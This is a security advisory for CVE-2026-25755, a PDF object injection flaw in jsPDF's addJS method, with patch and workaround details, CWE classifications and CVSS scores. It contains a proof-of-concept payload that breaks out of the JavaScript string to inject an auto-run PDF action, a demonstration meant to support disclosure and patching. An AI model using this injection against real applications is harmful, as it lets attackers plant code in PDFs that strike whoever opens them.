CVE-2026-25755

ADVISORY - github

Summary

Impact

User control of the argument of the addJS method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.

import { jsPDF } from "jspdf";
const doc = new jsPDF();
// Payload:
// 1. ) closes the JS string.
// 2. > closes the current dictionary.
// 3. /AA ... injects an "Additional Action" that executes on focus/open.
const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";

doc.addJS(maliciousPayload);
doc.save("vulnerable.pdf");

Patches

The vulnerability has been fixed in jspdf@4.2.0.

Workarounds

Escape parentheses in user-provided JavaScript code before passing them to the addJS method.

References

https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md

Common Weakness Enumeration (CWE)

ADVISORY - nist

CWE-116⁠

Improper Encoding or Escaping of Output

CWE-94⁠

Improper Control of Generation of Code ('Code Injection')

ADVISORY - github

CWE-116⁠

Improper Encoding or Escaping of Output

CWE-94⁠

Improper Control of Generation of Code ('Code Injection')

Impacted images

Advisories

NIST

CREATED

11 hours ago

UPDATED

10 hours ago

ADVISORY IDCVE-2026-25755⁠

EXPLOITABILITY SCORE

2.8

EXPLOITS FOUND

-

COMMON WEAKNESS ENUMERATION (CWE)

CWE-116⁠CWE-94⁠

CVSS SCORE

8.1high

GitHub

CREATED

6 hours ago

UPDATED

6 hours ago

ADVISORY IDGHSA-9vjf-qc39-jprp⁠

EXPLOITABILITY SCORE

2.8

EXPLOITS FOUND

-

COMMON WEAKNESS ENUMERATION (CWE)

CWE-116⁠CWE-94⁠

CVSS SCORE

8.1high